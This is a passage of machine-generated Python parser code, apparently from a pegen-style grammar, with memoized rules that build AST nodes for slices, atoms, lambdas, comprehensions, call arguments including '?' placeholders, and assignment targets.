return ast . Tuple ( elts = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ( ast . ExtSlice ( dims = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if any ( isinstance ( e , ast . Slice ) for e in a ) else ast . Index ( value = ast . Tuple ( elts = [e . value for e in a] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
return None
@memoize
def slice(self) -> Optional[Any]:
# slice: expression? ':' expression? [':' expression?] | named_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.expression(),)
and
(literal := self.expect(':'))
and
(b := self.expression(),)
and
(c := self._tmp_91(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Slice ( lower = a , upper = b , step = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.named_expression())
):
return a if sys . version_info >= ( 3 , 9 ) or isinstance ( a , ast . Slice ) else ast . Index ( value = a , lineno = a . lineno , col_offset = a . col_offset , end_lineno = a . end_lineno , end_col_offset = a . end_col_offset )
self._reset(mark)
return None
@memoize
def atom(self) -> Optional[Any]:
# atom: NAME | 'True' | 'False' | 'None' | &STRING strings | NUMBER | &'(' (tuple | group | genexp) | &'[' (list | listcomp) | &'{' (dict | set | dictcomp | setcomp) | '...'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('True'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = True , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('False'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = False , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('None'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = None , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
self.positive_lookahead(self.string, )
and
(strings := self.strings())
):
return strings
self._reset(mark)
if (
(a := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = ast . literal_eval ( a . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = ast . literal_eval ( a . string ) , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
self.positive_lookahead(self.expect, '(')
and
(_tmp_92 := self._tmp_92())
):
return _tmp_92
self._reset(mark)
if (
self.positive_lookahead(self.expect, '[')
and
(_tmp_93 := self._tmp_93())
):
return _tmp_93
self._reset(mark)
if (
self.positive_lookahead(self.expect, '{')
and
(_tmp_94 := self._tmp_94())
):
return _tmp_94
self._reset(mark)
if (
(literal := self.expect('...'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = Ellipsis , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . Constant ( value = Ellipsis , kind = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def group(self) -> Optional[Any]:
# group: '(' (yield_expr | named_expression) ')' | invalid_group
mark = self._mark()
if (
(literal := self.expect('('))
and
(a := self._tmp_95())
and
(literal_1 := self.expect(')'))
):
return a
self._reset(mark)
if (
(invalid_group := self.invalid_group())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def lambdef(self) -> Optional[Any]:
# lambdef: 'lambda' lambda_params? ':' expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('lambda'))
and
(a := self.lambda_params(),)
and
(literal_1 := self.expect(':'))
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Lambda ( args = a or self . make_arguments ( None , [] , None , [] , ( None , [] , None ) ) , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def lambda_params(self) -> Optional[Any]:
# lambda_params: invalid_lambda_parameters | lambda_parameters
mark = self._mark()
if (
(invalid_lambda_parameters := self.invalid_lambda_parameters())
):
return None # pragma: no cover
self._reset(mark)
if (
(lambda_parameters := self.lambda_parameters())
):
return lambda_parameters
self._reset(mark)
return None
@memoize
def lambda_parameters(self) -> Optional[ast . arguments]:
# lambda_parameters: lambda_slash_no_default lambda_param_no_default* lambda_param_with_default* lambda_star_etc? | lambda_slash_with_default lambda_param_with_default* lambda_star_etc? | lambda_param_no_default+ lambda_param_with_default* lambda_star_etc? | lambda_param_with_default+ lambda_star_etc? | lambda_star_etc
mark = self._mark()
if (
(a := self.lambda_slash_no_default())
and
(b := self._loop0_96(),)
and
(c := self._loop0_97(),)
and
(d := self.lambda_star_etc(),)
):
return self . make_arguments ( a , [] , b , c , d )
self._reset(mark)
if (
(a := self.lambda_slash_with_default())
and
(b := self._loop0_98(),)
and
(c := self.lambda_star_etc(),)
):
return self . make_arguments ( None , a , None , b , c )
self._reset(mark)
if (
(a := self._loop1_99())
and
(b := self._loop0_100(),)
and
(c := self.lambda_star_etc(),)
):
return self . make_arguments ( None , [] , a , b , c )
self._reset(mark)
if (
(a := self._loop1_101())
and
(b := self.lambda_star_etc(),)
):
return self . make_arguments ( None , [] , None , a , b )
self._reset(mark)
if (
(a := self.lambda_star_etc())
):
return self . make_arguments ( None , [] , None , [] , a )
self._reset(mark)
return None
@memoize
def lambda_slash_no_default(self) -> Optional[List [Tuple [ast . arg , None]]]:
# lambda_slash_no_default: lambda_param_no_default+ '/' ',' | lambda_param_no_default+ '/' &':'
mark = self._mark()
if (
(a := self._loop1_102())
and
(literal := self.expect('/'))
and
(literal_1 := self.expect(','))
):
return [( p , None ) for p in a]
self._reset(mark)
if (
(a := self._loop1_103())
and
(literal := self.expect('/'))
and
self.positive_lookahead(self.expect, ':')
):
return [( p , None ) for p in a]
self._reset(mark)
return None
@memoize
def lambda_slash_with_default(self) -> Optional[List [Tuple [ast . arg , Any]]]:
# lambda_slash_with_default: lambda_param_no_default* lambda_param_with_default+ '/' ',' | lambda_param_no_default* lambda_param_with_default+ '/' &':'
mark = self._mark()
if (
(a := self._loop0_104(),)
and
(b := self._loop1_105())
and
(literal := self.expect('/'))
and
(literal_1 := self.expect(','))
):
return ( [( p , None ) for p in a] if a else [] ) + b
self._reset(mark)
if (
(a := self._loop0_106(),)
and
(b := self._loop1_107())
and
(literal := self.expect('/'))
and
self.positive_lookahead(self.expect, ':')
):
return ( [( p , None ) for p in a] if a else [] ) + b
self._reset(mark)
return None
@memoize
def lambda_star_etc(self) -> Optional[Tuple [Optional [ast . arg] , List [Tuple [ast . arg , Any]] , Optional [ast . arg]]]:
# lambda_star_etc: '*' lambda_param_no_default lambda_param_maybe_default* lambda_kwds? | '*' ',' lambda_param_maybe_default+ lambda_kwds? | lambda_kwds | invalid_lambda_star_etc
mark = self._mark()
if (
(literal := self.expect('*'))
and
(a := self.lambda_param_no_default())
and
(b := self._loop0_108(),)
and
(c := self.lambda_kwds(),)
):
return ( a , b , c )
self._reset(mark)
if (
(literal := self.expect('*'))
and
(literal_1 := self.expect(','))
and
(b := self._loop1_109())
and
(c := self.lambda_kwds(),)
):
return ( None , b , c )
self._reset(mark)
if (
(a := self.lambda_kwds())
):
return ( None , [] , a )
self._reset(mark)
if (
(invalid_lambda_star_etc := self.invalid_lambda_star_etc())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def lambda_kwds(self) -> Optional[ast . arg]:
# lambda_kwds: '**' lambda_param_no_default
mark = self._mark()
if (
(literal := self.expect('**'))
and
(a := self.lambda_param_no_default())
):
return a
self._reset(mark)
return None
@memoize
def lambda_param_no_default(self) -> Optional[ast . arg]:
# lambda_param_no_default: lambda_param ',' | lambda_param &':'
mark = self._mark()
if (
(a := self.lambda_param())
and
(literal := self.expect(','))
):
return a
self._reset(mark)
if (
(a := self.lambda_param())
and
self.positive_lookahead(self.expect, ':')
):
return a
self._reset(mark)
return None
@memoize
def lambda_param_with_default(self) -> Optional[Tuple [ast . arg , Any]]:
# lambda_param_with_default: lambda_param default ',' | lambda_param default &':'
mark = self._mark()
if (
(a := self.lambda_param())
and
(c := self.default())
and
(literal := self.expect(','))
):
return ( a , c )
self._reset(mark)
if (
(a := self.lambda_param())
and
(c := self.default())
and
self.positive_lookahead(self.expect, ':')
):
return ( a , c )
self._reset(mark)
return None
@memoize
def lambda_param_maybe_default(self) -> Optional[Tuple [ast . arg , Any]]:
# lambda_param_maybe_default: lambda_param default? ',' | lambda_param default? &':'
mark = self._mark()
if (
(a := self.lambda_param())
and
(c := self.default(),)
and
(literal := self.expect(','))
):
return ( a , c )
self._reset(mark)
if (
(a := self.lambda_param())
and
(c := self.default(),)
and
self.positive_lookahead(self.expect, ':')
):
return ( a , c )
self._reset(mark)
return None
@memoize
def lambda_param(self) -> Optional[ast . arg]:
# lambda_param: NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . arg ( arg = a . string , annotation = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if sys . version_info >= ( 3 , 9 ) else ast . arg ( arg = a . string , annotation = None , type_comment = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def strings(self) -> Optional[ast . Str]:
# strings: STRING+
mark = self._mark()
if (
(a := self._loop1_110())
):
return self . generate_ast_for_string ( a )
self._reset(mark)
return None
@memoize
def list(self) -> Optional[ast . List]:
# list: '[' star_named_expressions? ']'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('['))
and
(a := self.star_named_expressions(),)
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . List ( elts = a or [] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def tuple(self) -> Optional[ast . Tuple]:
# tuple: '(' [star_named_expression ',' star_named_expressions?] ')'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('('))
and
(a := self._tmp_111(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = a or [] , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def set(self) -> Optional[ast . Set]:
# set: '{' star_named_expressions '}'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(a := self.star_named_expressions())
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Set ( elts = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def dict(self) -> Optional[ast . Dict]:
# dict: '{' double_starred_kvpairs? '}' | '{' invalid_double_starred_kvpairs '}'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(a := self.double_starred_kvpairs(),)
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Dict ( keys = [kv [0] for kv in ( a or [] )] , values = [kv [1] for kv in ( a or [] )] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(invalid_double_starred_kvpairs := self.invalid_double_starred_kvpairs())
and
(literal_1 := self.expect('}'))
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def double_starred_kvpairs(self) -> Optional[list]:
# double_starred_kvpairs: ','.double_starred_kvpair+ ','?
mark = self._mark()
if (
(a := self._gather_112())
and
(opt := self.expect(','),)
):
return a
self._reset(mark)
return None
@memoize
def double_starred_kvpair(self) -> Optional[Any]:
# double_starred_kvpair: '**' bitwise_or | kvpair
mark = self._mark()
if (
(literal := self.expect('**'))
and
(a := self.bitwise_or())
):
return ( None , a )
self._reset(mark)
if (
(kvpair := self.kvpair())
):
return kvpair
self._reset(mark)
return None
@memoize
def kvpair(self) -> Optional[tuple]:
# kvpair: expression ':' expression
mark = self._mark()
if (
(a := self.expression())
and
(literal := self.expect(':'))
and
(b := self.expression())
):
return ( a , b )
self._reset(mark)
return None
@memoize
def for_if_clauses(self) -> Optional[List [ast . comprehension]]:
# for_if_clauses: for_if_clause+
mark = self._mark()
if (
(a := self._loop1_114())
):
return a
self._reset(mark)
return None
@memoize
def for_if_clause(self) -> Optional[ast . comprehension]:
# for_if_clause: 'async' 'for' star_targets 'in' ~ disjunction (('if' disjunction))* | 'for' star_targets 'in' ~ disjunction (('if' disjunction))* | invalid_for_target
mark = self._mark()
cut = False
if (
(literal := self.expect('async'))
and
(literal_1 := self.expect('for'))
and
(a := self.star_targets())
and
(literal_2 := self.expect('in'))
and
(cut := True)
and
(b := self.disjunction())
and
(c := self._loop0_115(),)
):
return self . check_version ( ( 3 , 6 ) , "Async comprehensions are" , ast . comprehension ( target = a , iter = b , ifs = c , is_async = 1 ) )
self._reset(mark)
if cut: return None
cut = False
if (
(literal := self.expect('for'))
and
(a := self.star_targets())
and
(literal_1 := self.expect('in'))
and
(cut := True)
and
(b := self.disjunction())
and
(c := self._loop0_116(),)
):
return ast . comprehension ( target = a , iter = b , ifs = c , is_async = 0 )
self._reset(mark)
if cut: return None
if (
(invalid_for_target := self.invalid_for_target())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def listcomp(self) -> Optional[ast . ListComp]:
# listcomp: '[' named_expression for_if_clauses ']' | invalid_comprehension
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('['))
and
(a := self.named_expression())
and
(b := self.for_if_clauses())
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ListComp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_comprehension := self.invalid_comprehension())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def setcomp(self) -> Optional[ast . SetComp]:
# setcomp: '{' named_expression for_if_clauses '}' | invalid_comprehension
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(a := self.named_expression())
and
(b := self.for_if_clauses())
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . SetComp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_comprehension := self.invalid_comprehension())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def genexp(self) -> Optional[ast . GeneratorExp]:
# genexp: '(' (assignment_expression | expression !':=') for_if_clauses ')' | invalid_comprehension
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('('))
and
(a := self._tmp_117())
and
(b := self.for_if_clauses())
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . GeneratorExp ( elt = a , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_comprehension := self.invalid_comprehension())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def dictcomp(self) -> Optional[ast . DictComp]:
# dictcomp: '{' kvpair for_if_clauses '}' | invalid_dict_comprehension
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(a := self.kvpair())
and
(b := self.for_if_clauses())
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . DictComp ( key = a [0] , value = a [1] , generators = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_dict_comprehension := self.invalid_dict_comprehension())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def arguments(self) -> Optional[Tuple [list , list]]:
# arguments: args ','? &')' | invalid_arguments
mark = self._mark()
if (
(a := self.args())
and
(opt := self.expect(','),)
and
self.positive_lookahead(self.expect, ')')
):
return a
self._reset(mark)
if (
(invalid_arguments := self.invalid_arguments())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def args(self) -> Optional[Tuple [list , list]]:
# args: ','.(starred_expression | (assignment_expression | expression !':=') !'=')+ [',' kwargs] | kwargs
mark = self._mark()
if (
(a := self._gather_118())
and
(b := self._tmp_120(),)
):
return ( a + ( [e for e in b if isinstance ( e , ast . Starred )] if b else [] ) , ( [e for e in b if not isinstance ( e , ast . Starred )] if b else [] ) )
self._reset(mark)
if (
(a := self.kwargs())
):
return ( [e for e in a if isinstance ( e , ast . Starred )] , [e for e in a if not isinstance ( e , ast . Starred )] )
self._reset(mark)
return None
@memoize
def kwargs(self) -> Optional[list]:
# kwargs: ','.kwarg_or_starred+ ',' ','.kwarg_or_double_starred+ | ','.kwarg_or_starred+ | ','.kwarg_or_double_starred+
mark = self._mark()
if (
(a := self._gather_121())
and
(literal := self.expect(','))
and
(b := self._gather_123())
):
return a + b
self._reset(mark)
if (
(_gather_125 := self._gather_125())
):
return _gather_125
self._reset(mark)
if (
(_gather_127 := self._gather_127())
):
return _gather_127
self._reset(mark)
return None
@memoize
def starred_expression(self) -> Optional[Any]:
# starred_expression: '*' expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def kwarg_or_starred(self) -> Optional[Any]:
# kwarg_or_starred: invalid_kwarg | NAME '=' expression | starred_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_kwarg := self.invalid_kwarg())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.name())
and
(literal := self.expect('='))
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.starred_expression())
):
return a
self._reset(mark)
return None
@memoize
def kwarg_or_double_starred(self) -> Optional[Any]:
# kwarg_or_double_starred: invalid_kwarg | NAME '=' expression | '**' expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_kwarg := self.invalid_kwarg())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.name())
and
(literal := self.expect('='))
and
(b := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('**'))
and
(a := self.expression())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = None , value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def partial_arguments(self) -> Optional[Tuple [list , list]]:
# partial_arguments: partial_args ','? &')' | invalid_arguments
mark = self._mark()
if (
(a := self.partial_args())
and
(opt := self.expect(','),)
and
self.positive_lookahead(self.expect, ')')
):
return a
self._reset(mark)
if (
(invalid_arguments := self.invalid_arguments())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def partial_args(self) -> Optional[Tuple [list , list]]:
# partial_args: ",".(partial_placeholder | partial_starred_expression | (assignment_expression | expression !':=') !'=')+ [',' partial_kwargs] | partial_kwargs
mark = self._mark()
if (
(a := self._gather_129())
and
(b := self._tmp_131(),)
):
return ( a + ( [e for e in b if isinstance ( e , ast . Starred )] if b else [] ) , ( [e for e in b if not isinstance ( e , ast . Starred )] if b else [] ) )
self._reset(mark)
if (
(a := self.partial_kwargs())
):
return ( [e for e in a if isinstance ( e , ast . Starred )] , [e for e in a if not isinstance ( e , ast . Starred )] )
self._reset(mark)
return None
@memoize
def partial_kwargs(self) -> Optional[list]:
# partial_kwargs: ','.partial_kwarg_or_starred+ ',' ','.partial_kwarg_or_double_starred+ | ','.partial_kwarg_or_starred+ | ','.partial_kwarg_or_double_starred+
mark = self._mark()
if (
(a := self._gather_132())
and
(literal := self.expect(','))
and
(b := self._gather_134())
):
return a + b
self._reset(mark)
if (
(_gather_136 := self._gather_136())
):
return _gather_136
self._reset(mark)
if (
(_gather_138 := self._gather_138())
):
return _gather_138
self._reset(mark)
return None
@memoize
def partial_starred_expression(self) -> Optional[Any]:
# partial_starred_expression: '*' (partial_placeholder | expression)
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self._tmp_140())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = a , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def partial_kwarg_or_starred(self) -> Optional[Any]:
# partial_kwarg_or_starred: invalid_kwarg | NAME '=' (partial_placeholder | expression) | partial_starred_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_kwarg := self.invalid_kwarg())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.name())
and
(literal := self.expect('='))
and
(b := self._tmp_141())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.partial_starred_expression())
):
return a
self._reset(mark)
return None
@memoize
def partial_kwarg_or_double_starred(self) -> Optional[Any]:
# partial_kwarg_or_double_starred: invalid_kwarg | NAME '=' (partial_placeholder | expression) | '**' (partial_placeholder | expression)
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_kwarg := self.invalid_kwarg())
):
return None # pragma: no cover
self._reset(mark)
if (
(a := self.name())
and
(literal := self.expect('='))
and
(b := self._tmp_142())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = a . string , value = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('**'))
and
(a := self._tmp_143())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . keyword ( arg = None , value = a , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def partial_placeholder(self) -> Optional[Any]:
# partial_placeholder: '?'
mark = self._mark()
if (
(literal := self.expect('?'))
):
return "?"
self._reset(mark)
return None
@memoize
def star_targets(self) -> Optional[Any]:
# star_targets: star_target !',' | star_target ((',' star_target))* ','?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.star_target())
and
self.negative_lookahead(self.expect, ',')
):
return a
self._reset(mark)
if (
(a := self.star_target())
and
(b := self._loop0_144(),)
and
(opt := self.expect(','),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = [a] + b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def star_targets_list_seq(self) -> Optional[list]:
# star_targets_list_seq: ','.star_target+ ','?
mark = self._mark()
if (
(a := self._gather_145())
and
(opt := self.expect(','),)
):
return a
self._reset(mark)
return None
@memoize
def star_targets_tuple_seq(self) -> Optional[list]:
# star_targets_tuple_seq: star_target ((',' star_target))+ ','? | star_target ','
mark = self._mark()
if (
(a := self.star_target())
and
(b := self._loop1_147())
and
(opt := self.expect(','),)
):
return [a] + b
self._reset(mark)
if (
(a := self.star_target())
and
(literal := self.expect(','))
):
return [a]
self._reset(mark)
return None
@memoize
def star_target(self) -> Optional[Any]:
# star_target: '*' (!'*' star_target) | target_with_star_atom
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(a := self._tmp_148())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Starred ( value = self . set_expr_context ( a , Store ) , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(target_with_star_atom := self.target_with_star_atom())
):
return target_with_star_atom
self._reset(mark)
return None
@memoize
def target_with_star_atom(self) -> Optional[Any]:
# target_with_star_atom: t_primary '.' NAME !t_lookahead | t_primary '[' slices ']' !t_lookahead | star_atom
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.t_primary())
and
(literal := self.expect('.'))
and
(b := self.name())
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = a , attr = b . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(a := self.t_primary())
and
(literal := self.expect('['))
and
(b := self.slices())
and
(literal_1 := self.expect(']'))
and
self.negative_lookahead(self.t_lookahead, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Subscript ( value = a , slice = b , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(star_atom := self.star_atom())
):
return star_atom
self._reset(mark)
return None
@memoize
def star_atom(self) -> Optional[Any]:
# star_atom: NAME | '(' target_with_star_atom ')' | '(' star_targets_tuple_seq? ')' | '[' star_targets_list_seq? ']'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = a . string , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.target_with_star_atom())
and
(literal_1 := self.expect(')'))
):
return self . set_expr_context ( a , Store )
self._reset(mark)
if (
(literal := self.expect('('))
and
(a := self.star_targets_tuple_seq(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Tuple ( elts = a , ctx = Store , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('['))
and
